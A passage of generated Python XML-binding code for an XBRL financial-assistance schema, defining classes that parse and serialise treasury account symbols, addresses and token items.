        # True when local text or base-class state is present.
        if (
            self.valueOf_ or
            super(sourceJournalIDItemType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='sourceJournalIDItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Write this element to outfile: open tag, attributes, text, children, close tag."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='sourceJournalIDItemType')
        if self.hasContent_():
            outfile.write('>')
            # NOTE(review): .encode() returns bytes -- Python 2-era idiom;
            # under Python 3 outfile must accept bytes. Confirm target runtime.
            outfile.write(str(self.valueOf_).encode(ExternalEncoding))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='sourceJournalIDItemType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='sourceJournalIDItemType'):
        super(sourceJournalIDItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='sourceJournalIDItemType')
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='sourceJournalIDItemType', fromsubclass_=False, pretty_print=True):
        super(sourceJournalIDItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
        pass
    def build(self, node):
        """Populate this instance from an XML element node; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        super(sourceJournalIDItemType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Token items carry no child elements.
        pass
# end class sourceJournalIDItemType
class xbrlIncludeItemType(tokenItemType):
    """Generated XBRL binding for the finassist ``xbrlIncludeItemType`` element.

    A token item: a single text value (``valueOf_``) with attributes
    (``id``, ``contextRef``) handled by the ``tokenItemType`` base class.
    Generated serializer code -- statement order produces the exact XML
    bytes, so edits must preserve output byte-for-byte.
    """
    subclass = None  # optional override class used by factory()
    superclass = tokenItemType
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        self.original_tagname_ = None  # tag seen at parse time; overrides name_ on export
        super(xbrlIncludeItemType, self).__init__(id, contextRef, valueOf_, )
        self.valueOf_ = valueOf_  # element text content
    def factory(*args_, **kwargs_):
        # Instantiate the registered subclass when one is installed.
        if xbrlIncludeItemType.subclass:
            return xbrlIncludeItemType.subclass(*args_, **kwargs_)
        else:
            return xbrlIncludeItemType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        # True when local text or base-class state is present.
        if (
            self.valueOf_ or
            super(xbrlIncludeItemType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='xbrlIncludeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Write this element to outfile: open tag, attributes, text, children, close tag."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='xbrlIncludeItemType')
        if self.hasContent_():
            outfile.write('>')
            # NOTE(review): .encode() returns bytes -- Python 2-era idiom;
            # under Python 3 outfile must accept bytes. Confirm target runtime.
            outfile.write(str(self.valueOf_).encode(ExternalEncoding))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='xbrlIncludeItemType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='xbrlIncludeItemType'):
        super(xbrlIncludeItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='xbrlIncludeItemType')
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='xbrlIncludeItemType', fromsubclass_=False, pretty_print=True):
        super(xbrlIncludeItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
        pass
    def build(self, node):
        """Populate this instance from an XML element node; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        super(xbrlIncludeItemType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Token items carry no child elements.
        pass
# end class xbrlIncludeItemType
class phoneNumberDescriptionItemType(tokenItemType):
    """Generated XBRL binding for the finassist ``phoneNumberDescriptionItemType`` element.

    A token item: a single text value (``valueOf_``) with attributes
    (``id``, ``contextRef``) handled by the ``tokenItemType`` base class.
    Generated serializer code -- statement order produces the exact XML
    bytes, so edits must preserve output byte-for-byte.
    """
    subclass = None  # optional override class used by factory()
    superclass = tokenItemType
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        self.original_tagname_ = None  # tag seen at parse time; overrides name_ on export
        super(phoneNumberDescriptionItemType, self).__init__(id, contextRef, valueOf_, )
        self.valueOf_ = valueOf_  # element text content
    def factory(*args_, **kwargs_):
        # Instantiate the registered subclass when one is installed.
        if phoneNumberDescriptionItemType.subclass:
            return phoneNumberDescriptionItemType.subclass(*args_, **kwargs_)
        else:
            return phoneNumberDescriptionItemType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        # True when local text or base-class state is present.
        if (
            self.valueOf_ or
            super(phoneNumberDescriptionItemType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='phoneNumberDescriptionItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Write this element to outfile: open tag, attributes, text, children, close tag."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='phoneNumberDescriptionItemType')
        if self.hasContent_():
            outfile.write('>')
            # NOTE(review): .encode() returns bytes -- Python 2-era idiom;
            # under Python 3 outfile must accept bytes. Confirm target runtime.
            outfile.write(str(self.valueOf_).encode(ExternalEncoding))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='phoneNumberDescriptionItemType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='phoneNumberDescriptionItemType'):
        super(phoneNumberDescriptionItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='phoneNumberDescriptionItemType')
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='phoneNumberDescriptionItemType', fromsubclass_=False, pretty_print=True):
        super(phoneNumberDescriptionItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
        pass
    def build(self, node):
        """Populate this instance from an XML element node; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        super(phoneNumberDescriptionItemType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Token items carry no child elements.
        pass
# end class phoneNumberDescriptionItemType
class availableTypeCodeItemType(tokenItemType):
    """Generated XBRL binding for the finassist ``availableTypeCodeItemType`` element.

    A token item: a single text value (``valueOf_``) with attributes
    (``id``, ``contextRef``) handled by the ``tokenItemType`` base class.
    Used as the ``availabilityTypeCode`` child of
    ``TreasuryAccountSymbolComplexType`` in this file.
    """
    subclass = None  # optional override class used by factory()
    superclass = tokenItemType
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        self.original_tagname_ = None  # tag seen at parse time; overrides name_ on export
        super(availableTypeCodeItemType, self).__init__(id, contextRef, valueOf_, )
        self.valueOf_ = valueOf_  # element text content
    def factory(*args_, **kwargs_):
        # Instantiate the registered subclass when one is installed.
        if availableTypeCodeItemType.subclass:
            return availableTypeCodeItemType.subclass(*args_, **kwargs_)
        else:
            return availableTypeCodeItemType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        # True when local text or base-class state is present.
        if (
            self.valueOf_ or
            super(availableTypeCodeItemType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='availableTypeCodeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Write this element to outfile: open tag, attributes, text, children, close tag."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='availableTypeCodeItemType')
        if self.hasContent_():
            outfile.write('>')
            # NOTE(review): .encode() returns bytes -- Python 2-era idiom;
            # under Python 3 outfile must accept bytes. Confirm target runtime.
            outfile.write(str(self.valueOf_).encode(ExternalEncoding))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='availableTypeCodeItemType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='availableTypeCodeItemType'):
        super(availableTypeCodeItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='availableTypeCodeItemType')
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='availableTypeCodeItemType', fromsubclass_=False, pretty_print=True):
        super(availableTypeCodeItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
        pass
    def build(self, node):
        """Populate this instance from an XML element node; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        super(availableTypeCodeItemType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Token items carry no child elements.
        pass
# end class availableTypeCodeItemType
class TreasuryAccountSymbolComplexType(GeneratedsSuper):
    """Generated binding for the finassist ``TreasuryAccountSymbolComplexType``.

    Children (see buildChildren): ``agency`` (agencyComplexType),
    ``allocationTransferAgencyIdentifier`` (repeated integerItemType),
    ``mainAccountNumber`` (integerItemType), ``subAccountSymbol`` (repeated
    integerItemType), ``beginningPeriodOfAvailability`` /
    ``endingPeriodOfAvailability`` (repeated stringItemType), and
    ``availabilityTypeCode`` (availableTypeCodeItemType).  One XML
    attribute: ``id``.
    """
    subclass = None  # optional override class used by factory()
    superclass = None
    def __init__(self, id=None, agency=None, allocationTransferAgencyIdentifier=None, mainAccountNumber=None, subAccountSymbol=None, beginningPeriodOfAvailability=None, endingPeriodOfAvailability=None, availabilityTypeCode=None):
        self.original_tagname_ = None  # tag seen at parse time; overrides name_ on export
        self.id = _cast(None, id)
        self.agency = agency
        # Repeated children default to fresh lists (never a shared default arg).
        if allocationTransferAgencyIdentifier is None:
            self.allocationTransferAgencyIdentifier = []
        else:
            self.allocationTransferAgencyIdentifier = allocationTransferAgencyIdentifier
        self.mainAccountNumber = mainAccountNumber
        if subAccountSymbol is None:
            self.subAccountSymbol = []
        else:
            self.subAccountSymbol = subAccountSymbol
        if beginningPeriodOfAvailability is None:
            self.beginningPeriodOfAvailability = []
        else:
            self.beginningPeriodOfAvailability = beginningPeriodOfAvailability
        if endingPeriodOfAvailability is None:
            self.endingPeriodOfAvailability = []
        else:
            self.endingPeriodOfAvailability = endingPeriodOfAvailability
        self.availabilityTypeCode = availabilityTypeCode
    def factory(*args_, **kwargs_):
        # Instantiate the registered subclass when one is installed.
        if TreasuryAccountSymbolComplexType.subclass:
            return TreasuryAccountSymbolComplexType.subclass(*args_, **kwargs_)
        else:
            return TreasuryAccountSymbolComplexType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_agency(self): return self.agency
    def set_agency(self, agency): self.agency = agency
    def get_allocationTransferAgencyIdentifier(self): return self.allocationTransferAgencyIdentifier
    def set_allocationTransferAgencyIdentifier(self, allocationTransferAgencyIdentifier): self.allocationTransferAgencyIdentifier = allocationTransferAgencyIdentifier
    def add_allocationTransferAgencyIdentifier(self, value): self.allocationTransferAgencyIdentifier.append(value)
    def insert_allocationTransferAgencyIdentifier_at(self, index, value): self.allocationTransferAgencyIdentifier.insert(index, value)
    def replace_allocationTransferAgencyIdentifier_at(self, index, value): self.allocationTransferAgencyIdentifier[index] = value
    def get_mainAccountNumber(self): return self.mainAccountNumber
    def set_mainAccountNumber(self, mainAccountNumber): self.mainAccountNumber = mainAccountNumber
    def get_subAccountSymbol(self): return self.subAccountSymbol
    def set_subAccountSymbol(self, subAccountSymbol): self.subAccountSymbol = subAccountSymbol
    def add_subAccountSymbol(self, value): self.subAccountSymbol.append(value)
    def insert_subAccountSymbol_at(self, index, value): self.subAccountSymbol.insert(index, value)
    def replace_subAccountSymbol_at(self, index, value): self.subAccountSymbol[index] = value
    def get_beginningPeriodOfAvailability(self): return self.beginningPeriodOfAvailability
    def set_beginningPeriodOfAvailability(self, beginningPeriodOfAvailability): self.beginningPeriodOfAvailability = beginningPeriodOfAvailability
    def add_beginningPeriodOfAvailability(self, value): self.beginningPeriodOfAvailability.append(value)
    def insert_beginningPeriodOfAvailability_at(self, index, value): self.beginningPeriodOfAvailability.insert(index, value)
    def replace_beginningPeriodOfAvailability_at(self, index, value): self.beginningPeriodOfAvailability[index] = value
    def get_endingPeriodOfAvailability(self): return self.endingPeriodOfAvailability
    def set_endingPeriodOfAvailability(self, endingPeriodOfAvailability): self.endingPeriodOfAvailability = endingPeriodOfAvailability
    def add_endingPeriodOfAvailability(self, value): self.endingPeriodOfAvailability.append(value)
    def insert_endingPeriodOfAvailability_at(self, index, value): self.endingPeriodOfAvailability.insert(index, value)
    def replace_endingPeriodOfAvailability_at(self, index, value): self.endingPeriodOfAvailability[index] = value
    def get_availabilityTypeCode(self): return self.availabilityTypeCode
    def set_availabilityTypeCode(self, availabilityTypeCode): self.availabilityTypeCode = availabilityTypeCode
    def get_id(self): return self.id
    def set_id(self, id): self.id = id
    def hasContent_(self):
        # Any present child (or non-empty repeated-child list) counts as content.
        if (
            self.agency is not None or
            self.allocationTransferAgencyIdentifier or
            self.mainAccountNumber is not None or
            self.subAccountSymbol or
            self.beginningPeriodOfAvailability or
            self.endingPeriodOfAvailability or
            self.availabilityTypeCode is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='TreasuryAccountSymbolComplexType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:gen="http://www.xbrl.org/int/gl/gen/2006-10-25" ', pretty_print=True):
        """Write this element to outfile: open tag, attributes, children, close tag."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='TreasuryAccountSymbolComplexType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='TreasuryAccountSymbolComplexType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='TreasuryAccountSymbolComplexType'):
        # Emit the id attribute at most once.
        if self.id is not None and 'id' not in already_processed:
            already_processed.add('id')
            outfile.write(' id=%s' % (quote_attrib(self.id), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='TreasuryAccountSymbolComplexType', fromsubclass_=False, pretty_print=True):
        """Serialize child elements in schema order under the gen: namespace."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.agency is not None:
            self.agency.export(outfile, level, namespace_='gen:', name_='agency', pretty_print=pretty_print)
        for allocationTransferAgencyIdentifier_ in self.allocationTransferAgencyIdentifier:
            allocationTransferAgencyIdentifier_.export(outfile, level, namespace_='gen:', name_='allocationTransferAgencyIdentifier', pretty_print=pretty_print)
        if self.mainAccountNumber is not None:
            self.mainAccountNumber.export(outfile, level, namespace_='gen:', name_='mainAccountNumber', pretty_print=pretty_print)
        for subAccountSymbol_ in self.subAccountSymbol:
            subAccountSymbol_.export(outfile, level, namespace_='gen:', name_='subAccountSymbol', pretty_print=pretty_print)
        for beginningPeriodOfAvailability_ in self.beginningPeriodOfAvailability:
            beginningPeriodOfAvailability_.export(outfile, level, namespace_='gen:', name_='beginningPeriodOfAvailability', pretty_print=pretty_print)
        for endingPeriodOfAvailability_ in self.endingPeriodOfAvailability:
            endingPeriodOfAvailability_.export(outfile, level, namespace_='gen:', name_='endingPeriodOfAvailability', pretty_print=pretty_print)
        if self.availabilityTypeCode is not None:
            self.availabilityTypeCode.export(outfile, level, namespace_='gen:', name_='availabilityTypeCode', pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from an XML element node; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Only the id attribute is recognized.
        value = find_attr_value_('id', node)
        if value is not None and 'id' not in already_processed:
            already_processed.add('id')
            self.id = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Dispatch one parsed child element by its local tag name."""
        if nodeName_ == 'agency':
            obj_ = agencyComplexType.factory()
            obj_.build(child_)
            self.agency = obj_
            obj_.original_tagname_ = 'agency'
        elif nodeName_ == 'allocationTransferAgencyIdentifier':
            obj_ = integerItemType.factory()
            obj_.build(child_)
            self.allocationTransferAgencyIdentifier.append(obj_)
            obj_.original_tagname_ = 'allocationTransferAgencyIdentifier'
        elif nodeName_ == 'mainAccountNumber':
            obj_ = integerItemType.factory()
            obj_.build(child_)
            self.mainAccountNumber = obj_
            obj_.original_tagname_ = 'mainAccountNumber'
        elif nodeName_ == 'subAccountSymbol':
            obj_ = integerItemType.factory()
            obj_.build(child_)
            self.subAccountSymbol.append(obj_)
            obj_.original_tagname_ = 'subAccountSymbol'
        elif nodeName_ == 'beginningPeriodOfAvailability':
            obj_ = stringItemType.factory()
            obj_.build(child_)
            self.beginningPeriodOfAvailability.append(obj_)
            obj_.original_tagname_ = 'beginningPeriodOfAvailability'
        elif nodeName_ == 'endingPeriodOfAvailability':
            obj_ = stringItemType.factory()
            obj_.build(child_)
            self.endingPeriodOfAvailability.append(obj_)
            obj_.original_tagname_ = 'endingPeriodOfAvailability'
        elif nodeName_ == 'availabilityTypeCode':
            obj_ = availableTypeCodeItemType.factory()
            obj_.build(child_)
            self.availabilityTypeCode = obj_
            obj_.original_tagname_ = 'availabilityTypeCode'
# end class TreasuryAccountSymbolComplexType
class addressComplexType(GeneratedsSuper):
    """Generated binding for the finassist ``addressComplexType``.

    Optional single-valued children (see buildChildren): ``streetAddress``
    (streetAddressComplexType), ``city``, ``county``, ``postalCode``,
    ``zipCodePlus4``, ``countryName``, ``countryCode`` (stringItemType),
    ``state`` (stateItemType), ``congressionalDistrict``
    (congressionalDistrictItemType).  One XML attribute: ``id``.
    """
    subclass = None  # optional override class used by factory()
    superclass = None
    def __init__(self, id=None, streetAddress=None, city=None, county=None, state=None, postalCode=None, zipCodePlus4=None, countryName=None, countryCode=None, congressionalDistrict=None):
        self.original_tagname_ = None  # tag seen at parse time; overrides name_ on export
        self.id = _cast(None, id)
        self.streetAddress = streetAddress
        self.city = city
        self.county = county
        self.state = state
        self.postalCode = postalCode
        self.zipCodePlus4 = zipCodePlus4
        self.countryName = countryName
        self.countryCode = countryCode
        self.congressionalDistrict = congressionalDistrict
    def factory(*args_, **kwargs_):
        # Instantiate the registered subclass when one is installed.
        if addressComplexType.subclass:
            return addressComplexType.subclass(*args_, **kwargs_)
        else:
            return addressComplexType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_streetAddress(self): return self.streetAddress
    def set_streetAddress(self, streetAddress): self.streetAddress = streetAddress
    def get_city(self): return self.city
    def set_city(self, city): self.city = city
    def get_county(self): return self.county
    def set_county(self, county): self.county = county
    def get_state(self): return self.state
    def set_state(self, state): self.state = state
    def get_postalCode(self): return self.postalCode
    def set_postalCode(self, postalCode): self.postalCode = postalCode
    def get_zipCodePlus4(self): return self.zipCodePlus4
    def set_zipCodePlus4(self, zipCodePlus4): self.zipCodePlus4 = zipCodePlus4
    def get_countryName(self): return self.countryName
    def set_countryName(self, countryName): self.countryName = countryName
    def get_countryCode(self): return self.countryCode
    def set_countryCode(self, countryCode): self.countryCode = countryCode
    def get_congressionalDistrict(self): return self.congressionalDistrict
    def set_congressionalDistrict(self, congressionalDistrict): self.congressionalDistrict = congressionalDistrict
    def get_id(self): return self.id
    def set_id(self, id): self.id = id
    def hasContent_(self):
        # Any present child counts as content.
        if (
            self.streetAddress is not None or
            self.city is not None or
            self.county is not None or
            self.state is not None or
            self.postalCode is not None or
            self.zipCodePlus4 is not None or
            self.countryName is not None or
            self.countryCode is not None or
            self.congressionalDistrict is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='addressComplexType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:gen="http://www.xbrl.org/int/gl/gen/2006-10-25" ', pretty_print=True):
        """Write this element to outfile: open tag, attributes, children, close tag."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='addressComplexType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='addressComplexType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='addressComplexType'):
        # Emit the id attribute at most once.
        if self.id is not None and 'id' not in already_processed:
            already_processed.add('id')
            outfile.write(' id=%s' % (quote_attrib(self.id), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='addressComplexType', fromsubclass_=False, pretty_print=True):
        """Serialize child elements in schema order under the gen: namespace."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.streetAddress is not None:
            self.streetAddress.export(outfile, level, namespace_='gen:', name_='streetAddress', pretty_print=pretty_print)
        if self.city is not None:
            self.city.export(outfile, level, namespace_='gen:', name_='city', pretty_print=pretty_print)
        if self.county is not None:
            self.county.export(outfile, level, namespace_='gen:', name_='county', pretty_print=pretty_print)
        if self.state is not None:
            self.state.export(outfile, level, namespace_='gen:', name_='state', pretty_print=pretty_print)
        if self.postalCode is not None:
            self.postalCode.export(outfile, level, namespace_='gen:', name_='postalCode', pretty_print=pretty_print)
        if self.zipCodePlus4 is not None:
            self.zipCodePlus4.export(outfile, level, namespace_='gen:', name_='zipCodePlus4', pretty_print=pretty_print)
        if self.countryName is not None:
            self.countryName.export(outfile, level, namespace_='gen:', name_='countryName', pretty_print=pretty_print)
        if self.countryCode is not None:
            self.countryCode.export(outfile, level, namespace_='gen:', name_='countryCode', pretty_print=pretty_print)
        if self.congressionalDistrict is not None:
            self.congressionalDistrict.export(outfile, level, namespace_='gen:', name_='congressionalDistrict', pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from an XML element node; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Only the id attribute is recognized.
        value = find_attr_value_('id', node)
        if value is not None and 'id' not in already_processed:
            already_processed.add('id')
            self.id = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Dispatch one parsed child element by its local tag name."""
        if nodeName_ == 'streetAddress':
            obj_ = streetAddressComplexType.factory()
            obj_.build(child_)
            self.streetAddress = obj_
            obj_.original_tagname_ = 'streetAddress'
        elif nodeName_ == 'city':
            obj_ = stringItemType.factory()
            obj_.build(child_)
            self.city = obj_
            obj_.original_tagname_ = 'city'
        elif nodeName_ == 'county':
            obj_ = stringItemType.factory()
            obj_.build(child_)
            self.county = obj_
            obj_.original_tagname_ = 'county'
        elif nodeName_ == 'state':
            obj_ = stateItemType.factory()
            obj_.build(child_)
            self.state = obj_
            obj_.original_tagname_ = 'state'
        elif nodeName_ == 'postalCode':
            obj_ = stringItemType.factory()
            obj_.build(child_)
            self.postalCode = obj_
            obj_.original_tagname_ = 'postalCode'
        elif nodeName_ == 'zipCodePlus4':
            obj_ = stringItemType.factory()
            obj_.build(child_)
            self.zipCodePlus4 = obj_
            obj_.original_tagname_ = 'zipCodePlus4'
        elif nodeName_ == 'countryName':
            obj_ = stringItemType.factory()
            obj_.build(child_)
            self.countryName = obj_
            obj_.original_tagname_ = 'countryName'
        elif nodeName_ == 'countryCode':
            obj_ = stringItemType.factory()
            obj_.build(child_)
            self.countryCode = obj_
            obj_.original_tagname_ = 'countryCode'
        elif nodeName_ == 'congressionalDistrict':
            obj_ = congressionalDistrictItemType.factory()
            obj_.build(child_)
            self.congressionalDistrict = obj_
            obj_.original_tagname_ = 'congressionalDistrict'
# end class addressComplexType
class streetAddressComplexType(GeneratedsSuper):
    """Generated binding for the finassist ``streetAddressComplexType``.

    Holds a repeated ``streetAddressLine`` child (stringItemType list) and
    one XML attribute, ``id``.  Used as the ``streetAddress`` child of
    ``addressComplexType`` in this file.
    """
    subclass = None  # optional override class used by factory()
    superclass = None
    def __init__(self, id=None, streetAddressLine=None):
        self.original_tagname_ = None  # tag seen at parse time; overrides name_ on export
        self.id = _cast(None, id)
        # Repeated child defaults to a fresh list (never a shared default arg).
        if streetAddressLine is None:
            self.streetAddressLine = []
        else:
            self.streetAddressLine = streetAddressLine
    def factory(*args_, **kwargs_):
        # Instantiate the registered subclass when one is installed.
        if streetAddressComplexType.subclass:
            return streetAddressComplexType.subclass(*args_, **kwargs_)
        else:
            return streetAddressComplexType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_streetAddressLine(self): return self.streetAddressLine
    def set_streetAddressLine(self, streetAddressLine): self.streetAddressLine = streetAddressLine
    def add_streetAddressLine(self, value): self.streetAddressLine.append(value)
    def insert_streetAddressLine_at(self, index, value): self.streetAddressLine.insert(index, value)
    def replace_streetAddressLine_at(self, index, value): self.streetAddressLine[index] = value
    def get_id(self): return self.id
    def set_id(self, id): self.id = id
    def hasContent_(self):
        # A non-empty streetAddressLine list counts as content.
        if (
            self.streetAddressLine
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='streetAddressComplexType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:gen="http://www.xbrl.org/int/gl/gen/2006-10-25" ', pretty_print=True):
        """Write this element to outfile: open tag, attributes, children, close tag."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='streetAddressComplexType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='streetAddressComplexType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
